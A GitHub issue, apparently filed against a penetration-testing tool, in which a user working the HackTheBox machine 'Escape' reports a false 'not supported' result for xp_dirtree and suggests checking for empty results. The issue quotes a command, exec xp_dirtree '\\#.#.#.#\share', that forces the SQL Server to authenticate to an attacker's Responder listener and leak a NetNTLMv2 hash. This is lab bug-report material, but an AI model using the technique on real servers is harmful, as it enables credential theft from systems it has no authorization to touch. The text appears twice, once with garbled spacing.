You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Hi, I am working through the HackTheBox machine, Escape, and I found that xp_dirtree was incorrectly reported as not supported:
I used impacket-mssclient and DBeaver to run exec xp_dirtree '\\#.#.#.#\share' which successfully connected to my Responder instance providing a NetNTLMv2 hash. The user I am using holds public access only.
Looking at the verbose comments, my guess is that this particular box does not have a C:\. I'll continue working and see if this box has a C:\ later on. What I find interesting is that the result was an empty list [], not a SQL error. I am no expert at SQL, but could we modify the xpdirectory module to check if [] was returned and not a SQL error?
The text was updated successfully, but these errors were encountered:
Hi, I am working through the HackTheBox machine, Escape, and I found that xp_dirtree was incorrectly reported as not supported:
I used
impacket-mssclient
and DBeaver to runexec xp_dirtree '\\#.#.#.#\share'
which successfully connected to my Responder instance providing a NetNTLMv2 hash. The user I am using holdspublic
access only.Looking at the verbose comments, my guess is that this particular box does not have a
C:\
. I'll continue working and see if this box has aC:\
later on. What I find interesting is that the result was an empty list[]
, not a SQL error. I am no expert at SQL, but could we modify thexpdirectory
module to check if[]
was returned and not a SQL error?The text was updated successfully, but these errors were encountered: